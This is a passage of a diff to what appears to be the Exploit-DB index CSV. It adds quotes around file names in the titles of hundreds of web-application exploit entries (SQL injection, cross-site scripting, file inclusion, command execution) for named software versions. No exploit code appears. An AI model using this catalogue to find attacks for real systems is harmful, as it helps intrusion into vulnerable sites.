Scripting",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 -22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE - Reminder.php SQL Injection",2003-01-12,"VOID.AT Security",php,webapps,0 -22148,platforms/php/webapps/22148.txt,"PHPPass 2 - AccessControl.php SQL Injection",2003-01-13,frog,php,webapps,0 +22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE - 'Reminder.php' SQL Injection",2003-01-12,"VOID.AT Security",php,webapps,0 +22148,platforms/php/webapps/22148.txt,"PHPPass 2 - 'AccessControl.php' SQL Injection",2003-01-13,frog,php,webapps,0 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php' bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php' File Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 @@ -26802,11 +26803,11 @@ id,file,description,date,author,platform,type,port 22169,platforms/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (1)",2003-01-13,dodo,cgi,webapps,0 22170,platforms/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps,0 22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 -22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - help.php Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0 -22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - edit.php SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 +22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - 'help.php' Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0 +22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - 'edit.php' SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 -22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 +22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - 'privmsg.php' SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,php,webapps,0 @@ -26817,7 +26818,7 @@ id,file,description,date,author,platform,type,port 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Inclusion",2003-01-30,Havenard,php,webapps,0 22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Inclusion",2003-02-03,frog,php,webapps,0 -22209,platforms/php/webapps/22209.txt,"PHPMyShop 1.0 - compte.php SQL Injection",2003-02-03,frog,php,webapps,0 +22209,platforms/php/webapps/22209.txt,"PHPMyShop 1.0 - 'compte.php' SQL Injection",2003-02-03,frog,php,webapps,0 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0 40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0 22222,platforms/php/webapps/22222.txt,"TOPO 1.41 - Full Path Disclosure",2003-02-04,"Rynho Zeros Web",php,webapps,0 @@ -26835,7 +26836,7 @@ id,file,description,date,author,platform,type,port 22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps,0 22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps,0 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0 -22267,platforms/php/webapps/22267.php,"PHPBB2 - Page_Header.php SQL Injection",2003-02-19,"David Zentner",php,webapps,0 +22267,platforms/php/webapps/22267.php,"PHPBB2 - 'Page_Header.php' SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 @@ -26872,7 +26873,7 @@ id,file,description,date,author,platform,type,port 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22385,platforms/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22386,platforms/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 -22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - calendar.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 +22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - 'calendar.php' Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22392,platforms/php/webapps/22392.txt,"osCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 @@ -26886,14 +26887,14 @@ id,file,description,date,author,platform,type,port 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps,0 40412,platforms/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",php,webapps,80 -22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - article.php SQL Injection",2003-03-22,frog,php,webapps,0 +22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - 'article.php' SQL Injection",2003-03-22,frog,php,webapps,0 22414,platforms/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection",2003-03-23,frog,php,webapps,0 22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 - HTML Code Injection",2003-03-25,Over_G,php,webapps,0 22422,platforms/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon - 'Viewpage.php' File Disclosure",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps,0 -22423,platforms/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - viewtopic.php SQL Injection",2003-03-25,frog,php,webapps,0 -22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - viewforum.php SQL Injection",2003-03-25,frog,php,webapps,0 +22423,platforms/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewtopic.php' SQL Injection",2003-03-25,frog,php,webapps,0 +22424,platforms/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewforum.php' SQL Injection",2003-03-25,frog,php,webapps,0 22427,platforms/php/webapps/22427.txt,"WordPress Plugin All Video Gallery 1.1 - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 -22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 - member.php SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 +22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 - 'member.php' SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 @@ -26907,7 +26908,7 @@ id,file,description,date,author,platform,type,port 22451,platforms/php/webapps/22451.txt,"Phorum 3.4 - Email Subject Line Script Injection",2003-04-02,peter,php,webapps,0 22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - 'index.php' File Disclosure",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 - 'index.php' LNG File Disclosure",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 -22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 - functions.php SQL Injection",2003-04-05,"Gossi The Dog",php,webapps,0 +22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 - 'functions.php' SQL Injection",2003-04-05,"Gossi The Dog",php,webapps,0 22463,platforms/php/webapps/22463.txt,"WordPress Plugin Spider Catalog 1.1 - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps,0 22473,platforms/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",php,webapps,0 22474,platforms/php/webapps/22474.txt,"Py-Membres 4.0 - SQL Injection",2003-04-07,frog,php,webapps,0 @@ -26929,8 +26930,8 @@ id,file,description,date,author,platform,type,port 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 - board.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 - member.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 - 'board.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 - 'member.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 22524,platforms/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,asp,webapps,0 @@ -26968,7 +26969,7 @@ id,file,description,date,author,platform,type,port 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,php,webapps,0 -22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 - member.php Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0 +22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 - 'member.php' Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0 22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 - Web Administration Interface SQL Injection",2003-05-23,Gyrniff,asp,webapps,0 22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps,0 22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 @@ -26991,7 +26992,7 @@ id,file,description,date,author,platform,type,port 22698,platforms/asp/webapps/22698.pl,"WebCortex WebStores2000 - SQL Injection",2003-05-31,Bosen,asp,webapps,0 22702,platforms/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 - 'Expanded.php' Remote Command Execution",2003-06-02,_6mO_HaCk,php,webapps,0 22704,platforms/php/webapps/22704.txt,"Webchat 2.0 Module - Full Path Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 +22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - 'Expanded.php' Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 22708,platforms/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps,0 22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 @@ -26999,7 +27000,7 @@ id,file,description,date,author,platform,type,port 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - users.php Database 'Username' Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - 'users.php' Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 22724,platforms/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injections",2003-06-04,"Paul Craig",asp,webapps,0 22725,platforms/php/webapps/22725.txt,"PHP 4 - 'PHPInfo()' Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps,0 @@ -27023,7 +27024,7 @@ id,file,description,date,author,platform,type,port 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php?question' SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 -22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 +22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - '/Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - search.asp Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 @@ -27037,7 +27038,7 @@ id,file,description,date,author,platform,type,port 22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22812,platforms/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 -22818,platforms/php/webapps/22818.txt,"Tutos 1.1 - File_Select.php Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps,0 +22818,platforms/php/webapps/22818.txt,"Tutos 1.1 - 'File_Select.php' Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps,0 22819,platforms/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",php,webapps,0 22820,platforms/php/webapps/22820.txt,"XMB Forum 1.8 - 'member.php?member' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 22821,platforms/php/webapps/22821.txt,"XMB Forum 1.8 - 'buddy.php?action' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps,0 @@ -27062,7 +27063,7 @@ id,file,description,date,author,platform,type,port 23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps,0 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 -22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 +22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - 'download.php' Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 @@ -27108,7 +27109,7 @@ id,file,description,date,author,platform,type,port 22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23000,platforms/php/webapps/23000.txt,"geeeekShop 1.4 - Information Disclosure",2003-08-09,G00db0y,php,webapps,0 -23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - admin.php Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 +23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple Cross-Site Scripting POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - Arbitrary File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - PDA_limit Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -27119,7 +27120,7 @@ id,file,description,date,author,platform,type,port 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php?menuitem' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - '/index.php?menuitem' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 @@ -27129,7 +27130,7 @@ id,file,description,date,author,platform,type,port 23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 - Information Disclosure",2003-08-25,"cyber talon",cgi,webapps,0 23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x - Secure.php Unauthorized Access",2003-08-26,frog,php,webapps,0 -23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x - Pass_done.php SQL Injection",2003-08-26,frog,php,webapps,0 +23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x - 'Pass_done.php' SQL Injection",2003-08-26,frog,php,webapps,0 23064,platforms/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access",2003-08-26,frog,php,webapps,0 23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - LNG Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - Mod Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 @@ -27209,7 +27210,7 @@ id,file,description,date,author,platform,type,port 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",asp,webapps,0 23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 -23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - Include.php Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 +23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - 'Include.php' Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - Listing Parameter Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps,0 23338,platforms/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - dir Parameter HTML Injection",2003-11-04,nimber@designer.ru,php,webapps,0 @@ -27222,7 +27223,7 @@ id,file,description,date,author,platform,type,port 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0 -23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 +23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - 'profile.php' SQL Injection",2003-11-08,JOCANOR,php,webapps,0 23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 @@ -27252,25 +27253,25 @@ id,file,description,date,author,platform,type,port 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,php,webapps,0 -23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - 'members/index.inc.php' File Inclusion",2003-12-20,frog,php,webapps,0 +23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion",2003-12-20,frog,php,webapps,0 23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - 'message.php' File Inclusion",2003-12-20,frog,php,webapps,0 23456,platforms/php/webapps/23456.txt,"BES-CMS 0.4/0.5 - 'start.php' File Inclusion",2003-12-20,frog,php,webapps,0 23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - 'folder.php' File Inclusion",2003-12-20,frog,php,webapps,0 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - 'hacking.php' File Inclusion",2003-12-20,frog,php,webapps,0 -23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - MyLinks Myheader.php Cross-Site Scripting",2003-12-21,"Chintan Trivedi",php,webapps,0 +23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - 'MyLinks Myheader.php' Cross-Site Scripting",2003-12-21,"Chintan Trivedi",php,webapps,0 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 - products_id URI Parameter SQL Injection",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 - manufacturers_id Parameter Cross-Site Scripting",2003-12-22,JeiAr,php,webapps,0 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x (Multiple Modules) - SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 -23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 -23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 -23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 +23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - 'email.php' Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 +23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - 'Viewshoutbox.php' Cross-Site 